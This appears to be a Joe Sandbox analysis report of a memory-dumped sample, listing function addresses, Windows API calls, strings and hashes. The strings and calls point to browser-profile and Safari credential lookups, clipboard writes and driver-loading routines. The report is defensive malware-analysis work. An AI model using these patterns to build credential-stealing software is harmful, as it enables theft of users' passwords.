                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2014503067-0
                                                                                                                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7756DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                    • API String ID: 403622227-2664311388
                                                                                                                                                                                                                    • Opcode ID: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                    • API String ID: 577499730-1134094380
                                                                                                                                                                                                                    • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
